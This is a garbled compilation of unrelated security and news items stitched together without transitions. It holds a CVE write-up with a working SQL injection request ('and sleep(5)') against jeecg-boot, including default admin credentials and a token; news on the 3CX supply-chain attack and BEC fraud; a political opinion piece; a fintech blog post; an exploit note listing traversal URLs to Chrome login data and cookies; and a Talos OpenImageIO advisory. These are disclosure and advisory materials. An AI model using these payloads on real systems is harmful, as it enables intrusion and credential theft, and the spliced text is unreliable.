A vulnerability was found in jeecg-boot 3.5.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file SysDictMapper.java of the component Sleep Command Handler. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224629 was assigned to this vulnerability.

**SQL injection exists in the background interface of Jeecg-boot 3.5.0****Environmental Deployment**

Download source code

https://github.com/jeecgboot/jeecg-boot/releases/tag/v3.5.0

Deploy source code through idea

Configure pom and reload dependencies

Green Leaf Launch Project Appears  

**Vulnerability mining**

global search ${

jeecg-boot-3.5.0/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/mapper/xml/SysDictMapper.xml

There are variable splicing statements in line 106

Click on the duplicate CheckCountSqlNoDataId tag to jump to SysDictMapper.java for the statement with variable splicing in line 106

jeecg-boot-3.5.0/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/mapper/SysDictMapper.java

After clicking the duplicateCheckCountSqlNoDataId method, jump to the DuplicateCheckController controller

jeecg-boot-3.5.0/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/DuplicateCheckController.java

The general meaning of the code logic is that the get method accepts parameters and uses the SqlInjectionUtil method on line 55 to filter keywords, but does not filter sleep

The front-end access interface was tested and found to require X-Access-Token, otherwise it cannot be accessed

**Obtain the verification code image**

http://192.168.1.103:8080/jeecg-boot/sys/randomImage/9169ea44fee2e773df644053d67c94a1

**Copy body data to browser**

**Access background login address**

http://192.168.1.103:8080/jeecg-boot/sys/login

The get method is not supported, burpsuite packet capturing is changed to post

**Get token**

Get token and add Content Type: application/json Add post data

    {
    	"username":"admin",
    	"password":"123456",
    	"remember_me":"true",
    	"captcha":"mYUw",
    	"checkKey":"9169ea44fee2e773df644053d67c94a1"
    }
    

**Access Vulnerability Interface**

http://192.168.1.103:8080/jeecg-boot/#/default/%E9%87%8D%E5%A4%8D%E6%A0%A1%E9%AA%8C/doDuplicateCheckUsingGET

Set X-Access Token

Sending data and capturing packets

Normal data without delay

Enter and% 09sleep (5) for a delay time of five seconds

This is a packet

    GET /jeecg-boot/sys/duplicate/check?dataId=2000&fieldName=1+and%09sleep(5)&fieldVal=1000&tableName=sys_log HTTP/1.1
    Host: 192.168.1.103:8080
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    knife4j-gateway-code: ROOT
    X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2Nzk2NDM4OTUsInVzZXJuYW1lIjoiYWRtaW4ifQ.xJCpEt2pg3Zs5MdMYwcggZ85uLZcziQm_Ed1RQyC0kU
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.51
    Request-Origion: Knife4j
    Referer: http://192.168.1.103:8080/jeecg-boot/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
    Connection: close
    

**Repair plan**

These keywords such as and sleep if are also filtered.

CVE-2023-1741: report/README.md at main · private-null/report

A Manhattan grand jury has issued the first-ever indictment of a former US president. Buckle up for whatever happens next.

The literally unprecedented indictment against Donald Trump marks an outright dangerous—and politically fraught—moment for the United States and serves as a reminder of the unparalleled level of criminality and conspiracy that surrounded the 2016 election.

It’s easy to look back at the 2016 election as though its outcome was inevitable—that Hillary Clinton was too weak of a candidate, one whose years of high-priced speeches had made her lose touch with the working-class voters of Wisconsin and Pennsylvania; that “but her emails” and Jim Comey’s repeated, inappropriate, and misguided meddling in the election turned the tide. But the new indictment of Trump is an important historical corrective, a moment that makes clear how the US, as a country, must reckon with the fact that Trump’s surprise victory was aided by not one but _two_ separate criminal conspiracies.

In the 2016 race’s final push, in an election that came down to incredibly narrow victories in just three states—10,704 voters in Michigan, 46,765 in Pennsylvania, and 22,177 in Wisconsin—and where Trump lost the overall popular vote by some 3 million votes, he was helped along by a massive and wide-ranging official Russian government operation. That effort was funded in part by oligarch Yevgeny Prigozhin, who is now behind the brutal combat of his Wagner Group mercenary army in Ukraine, which targeted US social media companies and activists on the ground. According to the US Department of Justice’s exhaustive report, in the second arm of the Russian operation, the military intelligence service GRU hacked top Democratic officials, leaked their emails, and shifted the national narrative around Clinton and other Democrats. (Not to mention that this gave rise to the Pizzagate conspiracy theory and, arguably, QAnon.) 

Then there was the separate criminal conspiracy that was the subject of today’s new indictment in New York: the plot in the final weeks of the 2016 election by Trump’s campaign, Trump family fixer Michael Cohen, and the _National Enquirer_ to pay hush money to bury stories of two of the candidate’s affairs, including infamously one with porn star Stormy Daniels. 

While it may seem like news of such an affair would have ended up being a nothingburger amid the campaign’s final weeks, it’s worth remembering the specific context that Cohen and the Trump orbit faced in those finals hours of the campaign. They were performing a fraught and knife’s-edge balancing act to hold onto support from conservatives and evangelicals in the wake of the devastating _Access Hollywood_ tape, a moment where vice presidential nominee Mike Pence seriously considered throwing in the towel himself. The follow-on of more non-family-values-friendly stories might well have begun an unrecoverable spiral. (It’s also worth remembering the still-suspicious interplay of these two threads: how, on a single Friday in October 2016, US intelligence leaders announced publicly for the first time that Russia was behind the election meddling, the _Washington Post_ scooped the existence of the lewd _Access Hollywood_ tape. And then, hours later, Wikileaks began dumping a fresh set of stolen emails from Clinton campaign chair John Podesta.)

The new criminal case related to that second Stormy Daniels conspiracy, brought by Manhattan district attorney Alvin Bragg, also is a reminder of the historic mistake by the US Justice Department to not pursue its own charges against Trump in the same matter. This was a mind-boggling abdication of responsibility given that the Justice Department—in the midst of Donald Trump’s own presidency, no less!—prosecuted Cohen for the same conspiracy, naming Trump in the charges against Cohen as “Individual 1” and, according to a new book by Elie Honig, outlined in a draft indictment Trump’s personal direction and involvement in the case.

According to the book by Honig, himself a former prosecutor, the Southern District of New York ultimately decided to drop any case against Trump after the president left office in January 2021 because, in part, they figured that bigger, more serious investigations were ahead stemming from the January 6 insurrection, which “made the campaign finance violations seem somehow trivial and outdated by comparison.” It was then, and stands now, a serious miscalculation, one that will currently contribute to the democratically untenable “Ford Principle” that presidents stand outside the law both while in office and after. 

Of course, it’s here that we come to what a fraught moment, politically and for American democracy, the historically novel indictment of a former president presents for us in the weeks and months ahead: The true test for Donald Trump and our country is not this particular case but whatever might come next. The New York charges might be the start of multiple criminal cases that would burden Trump even as he begins his phoenix-like presidential reelection bid.

There are signs that Georgia’s Fulton County district attorney is weighing “imminent” charges against Trump, potentially as part of a larger conspiracy, for his well-documented efforts to overturn the state’s election results in 2020. Meanwhile, Justice Department special counsel Jack Smith is zeroing in on potential charges surrounding Trump’s involvement in the January 6 insurrection and related election-meddling schemes, as well as Trump’s attempts to purloin and retain classified documents in Mar-a-Lago after his presidency. Just in recent days, in the classified documents case, a federal judge ruled that there was evidence of a crime that would allow Smith to pierce normal attorney-client privilege and force one of Trump’s lawyers to testify amid evidence that the lawyer participated in that potential crime.

The specter of these indictments has made Trump fire up his always-overheated rhetoric, threatening “death and destruction” if he’s indicted, posting a photo of Bragg and Trump holding a baseball bat, and generally sashaying around the country like a mafioso saying, “Nice country you have here, shame if something happened to it.” His opening campaign rally was in Waco, Texas, amid the 30th anniversary of a 51-day federal siege of a religious cult after the largest shoot-out in US law enforcement history. That standoff left four ATF agents dead and, following the horrific fiery end of the siege, more than 80 members of the Branch Davidian sect dead too. The event helped inspire the bombing of the Alfred P. Murrah Federal Building in Oklahoma City just two years later by a white supremacist, far-right extremist. 

It’s hard not to read Trump’s rally as anything less than a call to arms for his supporters amid the government’s moves against him.

For now, though, the country will wait—and wonder whether the next shoe to drop is more criminal charges or the beginnings of more Trump-inspired violence.

Trump’s Indictment Marks a Historic Reckoning

In a Solar Winds-like attack, compromised, digitally signed versions of 3CX DesktopApp are landing on user systems via the vendor's update mechanism.

Security researchers are sounding the alarm on what may well be another major SolarWinds or Kaseya-like supply chain attack, this time involving Windows and Mac versions of a widely used video conferencing, PBX, and business communication app from 3CX.

On March 30, multiple security vendors said they had observed legitimate, digitally signed versions of the 3CX DesktopApp bundled with malicious installers landing on user desktops via the company's official automatic update process, as well as via manual updates. The end result is a data-stealing malware being implanted as part of a likely cyber-espionage effort by an advanced persistent threat (APT) actor.

The potential impact of the new threat could be huge. 3CX claims some 600,000 installations worldwide with over 12 million daily users. Among its numerous big-name customers are companies like American Express, Avis, Coca Cola, Honda, McDonald's, Pepsi, and Toyota.

CrowdStrike assessed that the threat actor behind the campaign is Labyrinth Chollima, a group that many researchers believe is linked with the cyber-warfare unit of North Korea's intelligence agency, the Reconnaissance General Bureau (RGB). Labyrinth Chollima is one of four groups that CrowdStrike has assessed are part of North Korea's larger Lazarus Group.

The threat is still very much an active one. "Currently, the very latest installers and updates available on the public 3CX website are still the compromised and backdoored applications that are noted as known bad by numerous security firms," says John Hammond, senior security researcher at Huntress.

**Enterprise App Trojanized With Malicious Installers**

The weaponized app arrives on a host system when the 3CX Desktop Application automatically updates, or when a user grabs the latest version proactively. Once pushed to a system, the signed 3CX DesktopApp executes a malicious installer, which then beacons out to an attacker-controlled server, pulls down a second-stage, information-stealing malware from there, and installs it on the user's computer. CrowdStrike, one of the first to report on the threat on March 29, said in a few instances it had also observed malicious hands-on-keyboard activity on systems with the Trojanized 3CX app.

In a message early on March 30, 3CX CEO Nick Galea urged users to immediately uninstall the app, adding that Microsoft Windows Defender would do that automatically for users running the software. Galea urged customers that want the app's functionality to use the Web client version of the technology while the company works on delivering an update.

A security alert from 3CX CISO Pierre Jourdan identified the affected apps as Electron Windows App, shipped in Update 7, version numbers 18.12.407 & 18.12.416 and Electron Mac App version numbers 18.11.1213, 18.12.402, 18.12.407, & 18.12.416. "The issue appears to be one of the bundled libraries that we compiled into the Windows Electron App via GIT," Jourdan said.

**Attackers Likely Breached 3CX's Production Environment**

Neither Jourdan nor Galea's messages gave any indication of how the attacker managed to gain the access they needed to trojanize a signed 3CXDekstopApp.exe binary. But at least two security vendors that have analyzed the threat say it could have only happened if the attackers were in 3CX's development or build environment — in the same manner that SolarWinds was compromised.

"Although only 3CX has the complete picture of what happened, so far, from the forensics, we assess with high confidence that the threat actor had access to the production pipeline of 3CX," says Lotem Finkelstein, director of threat intelligence & research at Check Point Software. "The files are signed with 3CX certificates, the same as used for the previous benign versions. The code is built in a way that it keeps working as it normally should but also adds some malware."

Finkelstein says Check Point's investigation confirms that the Trojanized version of the 3CX DesktopApp is being delivered through either manual download or regular updates from the official system.

Dick O'Brien, principal intelligent analyst at Symantec Threat Hunter team, says the threat actor does not appear to have touched the main executable itself. Instead, the APT compromised two dynamic link libraries (DLLs) that were delivered along with the executable in the installer. 

"One DLL was replaced with a completely different file with the same name," O'Brien says. "The second was a Trojanized version of the legitimate DLL \[with\] the attackers essentially appending it with additional encrypted data." The attackers have used a technique, known as DLL sideloading, to trick the legitimate 3CX binary to load and execute the malicious DLL, he says.

O'Brien agrees that the attacker would have needed access to 3CX's production environment to pull off the hack. "How they did that remains unknown. But once they had access to the build environment, all they had to do was drop two DLLs into the build directory."

**Potentially Broad Impact**

Researchers at Huntress tracking the threat said they had so far sent out a total of 2,595 incident reports to customers warning them of hosts running susceptible versions of the 3CX desktop application. In these instances, the software matched the hash or identifier for one of the known bad applications. 

"The final stage of the attack chain as we know it is reaching out to the command-and-control servers, however, this appears to be on a set timer after seven days," says Huntress' Hammond. A Shodan search that Huntress conducted showed 242,519 publicly exposed 3CX systems, though the issue's impact is broader than just that set of targets.

"The updates received by the signed 3CX Desktop Application are coming from the legitimate 3CX update source, so at first blush, this looks normal," he adds. "Many end users did not expect the original and valid 3CX application to suddenly be setting off alarm bells from their antivirus or security products, and in the early timeline where there was not much information uncovered, and there was some confusion over whether the activity was malicious or not, he says.

**Shades of SolarWinds & Kaseya**

Hammond compares this incident to the breaches at SolarWinds and at Kaseya. 

With SolarWinds, attackers — likely linked with Russia's Foreign Intelligence Service — broke into the company's build environment and inserted a few lines of malicious code into updates for its Orion network management software. Some 18,000 customers received the updates, but the threat actor was really targeting only a small handful of them for subsequent compromise. 

The attack on Kaseya's VSA remote management technology resulted in more than 1,000 downstream customers of its managed service provider customers being impacted and subsequently targeted for ransomware delivery. The two attacks are examples of a growing trend of threat actors targeting trusted software providers and entities in the software supply chain to reach a broad set of victims. Concerns over the threat prompted President Biden to issue an executive order in May 2021 that contained specific requirements for bolstering supply chain security.

Automatic Updates Deliver Malicious 3CX 'Upgrades' to Enterprises

Business email compromise scams are moving beyond just stealing cash, with some threat actors fooling companies into sending goods and materials on credit, and then skipping out on payment.

Some cybercriminals are flipping their playbook on business email compromise (BEC) scams and, rather than posing as vendors seeking payment, are now posing as buyers, taking their profits in easily sold commodities.

By adopting the identity of a known company, criminal actors are able to order various goods in bulk, get beneficial terms of credit, and disappear before the manufacturer discovers the fraud, stated the FBI in a recent advisory on the trend. The scheme has become more common in specific sectors, with targets including construction materials, agricultural supplies, computer technology hardware, and solar-energy systems, according to the agency.

This form of fraud also allows attackers to escape the notice of financial institutions, which have become very skilled at tracking currency movement and clawing back funds, says Sourya Biswas, technical director of risk management and governance at NCC Group, a consultancy.

"BEC targeting commodities may have electronic records regarding the ordering, dispatch, and receipt of goods, but not for the last-mile piece where those goods are sold," he says. "Considering the types of commodities targeted — construction materials, computer hardware, etc. — these are typically easy to sell in pieces for cash to multiple buyers without triggering red flags."

This is not the first time that commodity theft has come to light. Last summer, BEC criminal groups targeted food manufacturers, stealing sugar and powdered milk by the truckload. In 2021, fraudsters used similar methods, posing as an electrical contracting company, to have 35 MacBooks worth almost $110,000 delivered to a business address, but switched the destination at the last minute.

**Same Tactics, Different Outcome**

In its advisory, the FBI noted that the tactics used by the criminal groups mimics those of more traditional BEC scams, with threat actors taking control of, or spoofing, legitimate domains of US companies, researching the proper employees to contact at a vendor, and then emailing requests to the vendor that appear to originate with the legitimate company.

However, commodities-fraud operations are harder to uncover than funds-focused BEC fraud. For instance, the criminal groups will often apply for Net-30 or Net-60 terms for payment by providing fake credit references and fraudulent tax forms to vendors, giving them lead time to fence the goods and disappear before suspicion might arise, the FBI stated in the advisory.

"Victimized vendors assume they are conducting legitimate business transactions fulfilling the purchase orders for distribution," the advisory stated. "The repayment terms allow criminal actors to initiate additional purchase orders without providing upfront payment."

**A Significant Evolution for BEC**

Commodities scams are decades old, especially with easy-to-resell electronics, says Roger Grimes, data-driven defense evangelist at KnowBe4, a cybersecurity services firm.

"If you know a little industry vernacular and how supply chains work, it's easier to convince the victims of the scam," he says. "It's also harder to trace the resell of those goods once the fraudster has obtained possession of them. But it also isn't every fraudster's first choice of how to get paid, because it significantly cuts down on profit margin."

The difference now is the interest in the gambit by cybercriminals previously carrying out BEC scams focused on fraudulent money transfers. 

The transition to targeting commodities is being driven by necessity in some cases, because BEC fraud is squarely on organizations' radars these days. In its "Internet Crime Report 2022," the FBI noted that its Recovery Asset Team (RAT) has recovered nearly three-quarters (73%) of all funds stolen by BEC groups since 2018. And financial institutions have become better at detecting fraud and cutting off funds more quickly, which has forced attackers to adapt, says Dmitry Bestuzhev, senior director of cyberthreat intelligence at BlackBerry.

"Financial institutions on both sides — sending or receiving funds — have been working to make it harder for the BEC operators," he says, adding that, for attackers, by "focusing on goods purchasing, it's an easier way to escape the monitoring algorithms ... so even if it's a two-step operation, it's still safer in terms of traceability and anti-fraud, prevention algorithms."

In addition, the simplicity of the scam has made the social-engineering aspects more effective. By asking for payment for goods, impersonating someone in authority, and using the language expected of business transactions, attackers are able to fool non-tech-savvy business people, says the NCC Group's Biswas.

Paying attention to advisories, such as the FBI's public service announcement, and building processes that can withstand social-engineering attacks is important, he says.

For instance, employees should be trained to spot obvious red flags. While compromising a legitimate company's email server provides a more convincing identity with which to conduct fraud, most criminal groups just use variants on the company name, such as changing a "company.com" domain to "co-pany.com" or "company-usa.com" domain, for example.

"Cybercriminals are always evolving, and defenders should evolve as well," Biswas says. "Any organization that pays for vendor services or supplies goods and services — that pretty much includes everyone — should always be on the lookout for ... new cybercrime tactics, techniques, and procedures (TTPs)."

BEC Fraudsters Expand to Snatch Real-World Goods in Commodities Twist

By Owais Sultan
This article explores the world of fintech applications, highlighting their most popular features now and in the next…
This is a post from HackRead.com Read the original post: The Future of Fintech Applications

This article explores the world of fintech applications, highlighting their most popular features now and in the next 5-10 years. Discover the key criteria for developing a fintech computer program, the design considerations to keep in mind, and the pros and cons of working with a development team or freelancers. Make an informed decision on how to bring your fintech application to life and stay ahead of the competition in the dynamic world of finance technology.

**The Future of Fintech Applications: Key Criteria, Design Considerations, and Pros and Cons of Development Teams vs. Freelancers**

Are you a fintech entrepreneur or developing an app for your finance business? Are you looking to create an appealing fintech app design and incorporate powerful technology features into your app? Look no further! This blog post will explore what should be included in a successful fintech application design and various tech features that can add value to your product.

**Reference**

A Fintech application is one created using relevant technology to deliver financial services. These applications’ most popular use cases are payments, budgeting, investments, and other financial services. Fintech applications provide users with fast, efficient, and low-cost financial assistance compared to traditional financial institutions.

1.  While modern fintech applications have made significant strides in improving financial services, some areas for improvement still exist in the industry. One of the most significant areas for improvement is the need for more personalization in financial advice and services. Many fintech apps provide a one-size-fits-all solution, which doesn’t cater to individual users’ specific needs and preferences.
2.  Another area where fintech applications could be improved is integrating different financial accounts and services. Many users have accounts and assets spread across various platforms, and there needs to be more seamless integration between these platforms. This can result in a disjointed experience for users, as they have to switch between different apps and platforms to manage their finances.
3.  Finally, security and privacy concerns remain significant issues in the fintech industry. While many apps provide robust security features, there is still a risk of data breaches and cyber-attacks. This can erode user trust and make them hesitant to adopt new fintech solutions.

These shortcomings allow startups to develop innovative solutions to address these issues. For example, AI and machine learning algorithms could achieve personalized financial advice and services. Integration of different financial accounts and services could be improved by developing a universal platform that connects all financial services.

Additionally, startups could focus on creating more secure and private solutions by leveraging blockchain technology and other cutting-edge security measures.

**What are the most popular online financial services?**

The most popular online financial services now include payment services (such as PayPal and Venmo), banking services (such as Chase and Wells Fargo), budgeting apps (such as Mint and Acorns), investing services (such as Robinhood and Fidelity), online loan attachments (such as LendingClub and Upstart) and credit cards (such as Discover and American Express).

In 5 years, some of the most popular financial services will likely include automated investing services (which use artificial intelligence to decide on investments), cryptocurrency services (such as Bitcoin and Ethereum exchanges), new loan products (such as P2P lending and micro-loans), tax optimization tools (such as TurboTax), blockchain-based services (which rely on distributed ledger technology), and digital banking services (which provide a comprehensive suite of financial services).

In 10 years, Fintech apps will likely become increasingly popular as they offer users greater convenience, security, and privacy. New technologies, such as Distributed Ledger Technology and automation, will enable a more straightforward implementation of services and feature the use of New Finance services. We also see applications incorporating fintech with other industries, such as health, entertainment, and transportation.

**How to develop a financial application? **

*   **Step 1**: Analyze Your Audience and Market. You must understand who you are building the financial application for, their needs, and the reality of the market. 
*   **Step 2**: Determine Your Features. Determine which features will best serve your audience and how to implement them.
*   **Step 3**: Develop the Backend. Create the technical architecture to handle data, create API integration, define security protocols, and more.
*   **Step 4**: Create the Frontend User Experience, and design the user interface to interact with customers.
*   **Step 5**: Test and Release. Thoroughly test the program and refine any issues, then release the attachment to users.

Whether it is worth developing your fintech application depends on various factors. Factors to consider include the cost of development, whether the features and services you’d like to offer are available in other Fintech apps, how well your app will address security and privacy, and the market potential for your app.

Ultimately, the decision to develop your Fintech app should be based on a thorough assessment of your goals, market landscape, and available resources.

**When developing a UI design for a fintech application, it is essential to pay attention to the following three points:**

*   **User Experience (UX)**

It’s about what the design should prioritize user experience by making it simple, intuitive, and easy to use. The interface should be designed to meet the target audience’s needs, and the functionality should be efficient and secure, with a good balance between speed and security.

*   **Personalization**

The design should allow users to customize their experience based on their preferences and needs. This can include features such as customizable dashboards, alerts, or notifications.

*   **Mobile Compatibility**

Since many users access fintech programs from their mobile devices, the design must be compatible with mobile devices. Therefore, the design should be responsive and optimized for mobile screens, ensuring that the user experience remains consistent across all devices.

**Who should be entrusted with developing a fintech application – a dev team or freelance programmers?**

When it comes to developing a fintech application, the choice between a development team or freelance programmers depends on the scope and complexity of the project. For smaller and less complex projects, freelance programmers may be sufficient.

For more comprehensive fintech applications that require a deeper understanding of the financial industry, it’s best to work with an experienced development team. Such units have the necessary skills, expertise, and resources to ensure successful app development. Ultimately, the decision should be based on the project’s specific requirements and budget.

**Conclusion**

In conclusion, this post is a comprehensive guide for entrepreneurs or developers looking to create a fintech app.

It also covers the steps to develop a financial app and the factors to consider before creating it. Its design should prioritize user experience, personalization, and mobile compatibility.

Finally, we emphasize that startups can develop innovative solutions to address shortcomings in the fintech industry, such as personalization, integrating different financial accounts and services, and security and privacy concerns.

1.  Why Payroll Is Next Firm Security Battleground?
2.  A Short Guide to Understanding the Fintech Realm
3.  Financial sector the most vulnerable to cyber attacks
4.  Power Plants to eWallets: Role of ZTNA in gig economy

The Future of Fintech Applications

Virtual Reception version 1.0 suffers from a directory traversal vulnerability.

    # Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal# Exploit Author: Spinae# Vendor Homepage: https://www.virtualreception.nl/# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY# Tested on: allWe discovered the web server of the Virtual Reception appliance is prone toan unauthenticated directory traversal vulnerability. This allows anattacker to traverse outside the server root directory by specifying filesat the end of a URL request.This is a NUC5i5RYhttp://[ip address]/c:/WINDOWS/System32/drivers/etc/hostshttp://[ip address]/C:/windows/WindowsUpdate.log...A user called 'receptie' exists on the Windows system:http://[ip address]/c:/users/receptie/ntuser.dathttp://[ip address]/c:/users/receptie/ntuser.inihttp://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log...http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/UserData/Default/Login Datahttp://[ipaddress]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20Statehttp://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/UserData/Default/Cookies...The appliance also keeps a log of the visitors that register at theentrance:http://[ip address]/visitors.csvhash icon for shodan searches:https://www.shodan.io/search?query=http.favicon.hash%3A656388049No reply from the vendor (phone, email, website form submissions), firstreported in 2021.-- DISCLAIMER: Unless indicated otherwise, the information contained in this message is privileged and confidential, and is intended only for the use of the addressee(s) named above and others who have been specifically authorized to receive it. If you are not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this message and/or attachments is strictly prohibited. The company accepts no liability for any damage caused by any virus transmitted by this message. Furthermore, the company does not warrant a proper and complete transmission of this information, nor does it accept liability for any delays. If you have received this message in error, please contact the sender and delete the message. Thank you.

Virtual Reception 1.0 Directory Traversal

An out-of-bounds read vulnerability exists in the TGAInput::decode_pixel() functionality of OpenImageIO Project OpenImageIO v2.4.7.1. A specially crafted targa file can lead to information disclosure. An attacker can provide a malicious file to trigger this vulnerability.

**SUMMARY**

An out-of-bounds read vulnerability exists in the TGAInput::decode\_pixel() functionality of OpenImageIO Project OpenImageIO v2.4.7.1. A specially crafted targa file can lead to information disclosure. An attacker can provide a malicious file to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

OpenImageIO Project OpenImageIO v2.4.7.1

**PRODUCT URLS**

OpenImageIO - https://github.com/OpenImageIO/oiio

**CVSSv3 SCORE**

7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-125 - Out-of-bounds Read

**DETAILS**

OpenImageIO is an image processing library with easy-to-use interfaces and a sizable number of supported image formats. Useful for conversion and processing and even image comparison, this library is utilized by 3D-processing software from AliceVision (including Meshroom), as well as Blender for reading Photoshop .psd files.

When reading in Targa (.tga) files, the libOpenImageIO code flows are pretty quick and easy, matching the relative simpleness of the file format itself. Starting with TGAInput::open(const std::stirng &name, ImageSpec& newspec):

    bool
    TGAInput::open(const std::string& name, ImageSpec& newspec)
    {
        m_filename = name;
    
        DBG("TGA opening {}\n", name);
        uint64_t filesize = Filesystem::file_size(name);
        m_file            = Filesystem::fopen(name, "rb");
        if (!m_file) {
            errorf("Could not open file \"%s\"", name);
            return false;
        }
    
        // Due to struct packing, we may get a corrupt header if we just load the
        // struct from file; to address that, read every member individually save
        // some typing. Byte swapping is done automatically. If any fail, the file
        // handle is closed and we return false from open().
        if (!(read(m_tga.idlen) && read(m_tga.cmap_type) && read(m_tga.type)
              && read(m_tga.cmap_first) && read(m_tga.cmap_length)
              && read(m_tga.cmap_size) && read(m_tga.x_origin)
              && read(m_tga.y_origin) && read(m_tga.width) && read(m_tga.height)
              && read(m_tga.bpp) && read(m_tga.attr))) {
            errorfmt("Could not read full header");
            return false;
        }
    

The file is opened and as shown above, and we start reading the appropriate fields into the following struct:

    <(^.^)>#ptype m_tga
    type = struct {
        uint8_t idlen;
        uint8_t cmap_type;
        uint8_t type;
        uint16_t cmap_first;
        uint16_t cmap_length;
        uint8_t cmap_size;
        uint16_t x_origin;
        uint16_t y_origin;
        uint16_t width;
        uint16_t height;
        uint8_t bpp1
        uint8_t attr;
    }
    

Soon after this, we enter bool TGAInput::readimg(), to read in the actual image data that we’re here for, referencing the forementioned headers to format it appropriately:

    bool TGAInput::readimg()
    {
        // how many bytes we actually read
        // for 15-bit read 2 bytes and ignore the 16th bit
        int bytespp    = (m_tga.bpp == 15) ? 2 : (m_tga.bpp / 8);
        int palbytespp = (m_tga.cmap_size == 15) ? 2 : (m_tga.cmap_size / 8);  // [1]
        int alphabits  = m_tga.attr & 0x0F;
        if (alphabits == 0 && m_tga.bpp == 32)
            alphabits = 8;
    
    /// [...] 
        // read palette, if there is any
        std::unique_ptr<unsigned char[]> palette;
        if (is_palette()) {
            palette.reset(new unsigned char[palbytespp * m_tga.cmap_length]);   // [2]
            if (!ioread(palette.get(), palbytespp, m_tga.cmap_length))          // [3]
                return false;
        }
    
        unsigned char pixel[4] = { 0, 0, 0, 0 };
        if (m_tga.type < TYPE_PALETTED_RLE) {
            // uncompressed image data
            DBG("TGA readimg, reading uncompressed image data\n");
            unsigned char in[4];
            for (int64_t y = m_spec.height - 1; y >= 0; y--) {
                for (int64_t x = 0; x < m_spec.width; x++) {
                    if (!ioread(in, bytespp, 1))
                        return false;
                    decode_pixel(in, pixel, palette.get(), bytespp, palbytespp);   // [4]
                    memcpy(m_buf.get() + y * m_spec.width * m_spec.nchannels
                               + x * m_spec.nchannels,
                           pixel, m_spec.nchannels);
                }
            }
        } else {
            // Run Length Encoded image
            unsigned char in[5];
            DBG("TGA readimg, reading RLE image data\n");
            int packet_size;
            for (int64_t y = m_spec.height - 1; y >= 0; y--) {
                for (int64_t x = 0; x < m_spec.width; x++) {
                    if (!ioread(in, 1 + bytespp, 1)) {
                        DBG("Failed on scanline {}\n", y);
                        return false;
                    }
                    packet_size = 1 + (in[0] & 0x7f);
                    decode_pixel(&in[1], pixel, palette.get(), bytespp, palbytespp);   // [5]
                    if (in[0] & 0x80) {  // run length packet
                        // DBG("[tga] run length packet size {} @ ({},{})\n",
                        //     packet_size, x, y);
    

At \[1\], our library determines the size of the int palbytespp variable, which it then uses at \[2\] to know how large of a temporary buffer to allocate. Immediately after, the correct amount of bytes is read into our palette struct, at \[3\]. Since image data typically ends up being compressed, we can then use this palette struct to generate our uncompressed data at \[4\] or \[5\], inside the decode_pixel function:

    inline void
    TGAInput::decode_pixel(unsigned char* in, unsigned char* out,
                           unsigned char* palette, int bytespp, int palbytespp)
    {
        unsigned int k = 0;
        // I hate nested switches...
        switch (m_tga.type) {
        case TYPE_PALETTED:
        case TYPE_PALETTED_RLE:
            for (int i = 0; i < bytespp; ++i)
                k |= in[i] << (8 * i);  // Assemble it in little endian order
            k = (m_tga.cmap_first + k) * palbytespp;                         // [6] 
            switch (palbytespp) {
                case 2:
                    // see the comment for 16bpp RGB below for an explanation of this
                    out[0] = bit_range_convert<5, 8>((palette[k + 1] & 0x7C) >> 2);     // [7]
                    out[1] = bit_range_convert<5, 8>(((palette[k + 0] & 0xE0) >> 5)
                                                     | ((palette[k + 1] & 0x03) << 3));
                    out[2] = bit_range_convert<5, 8>(palette[k + 0] & 0x1F);
                    break;
                case 3:
                    out[0] = palette[k + 2];
                    out[1] = palette[k + 1];
                    out[2] = palette[k + 0];
                    break;
                case 4:
                    out[0] = palette[k + 2];
                    out[1] = palette[k + 1];
                    out[2] = palette[k + 0];
                    out[3] = palette[k + 3];
                    break;
            }
            break;
        // [...]
    

We first populate the k variable at \[6\] to know where our palette data starts within our targa image, and then we start to populate uncompressed data into our single pixel starting with the code at \[7\]. It is here we have hit our vulnerability, however, as an important fact has yet to be mentioned: our cmap_first variable, which comes from the initial targa headers, has no validation on it whatsoever. As such, there are no checks to see if cmap_first is even within the bounds of our image file, and we can end up reading out of bounds heap data for our palette, resulting in an information disclosure.

**Crash Information**

    Running: crash-355fc8ab0e18a3024ad2775157eaff1dda2e0994
    =================================================================
    ==530887==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61500000417d at pc 0x7ffff3c1139a bp 0x7fffffff8a50 sp 0x7fffffff8a48
    READ of size 1 at 0x61500000417d thread T0
    [Detaching after fork from child process 530919]
        #0 0x7ffff3c11399 in OpenImageIO_v2_4::TGAInput::decode_pixel(unsigned char*, unsigned char*, unsigned char*, int, int) /oiio/oiio-2.4.7.1/src/targa.imageio/targainput.cpp:574:47
        #1 0x7ffff3c19bae in OpenImageIO_v2_4::TGAInput::readimg() /oiio/oiio-2.4.7.1/src/targa.imageio/targainput.cpp:745:17
        #2 0x7ffff3c24f09 in OpenImageIO_v2_4::TGAInput::read_native_scanline(int, int, int, int, void*) /oiio/oiio-2.4.7.1/src/targa.imageio/targainput.cpp:881:14
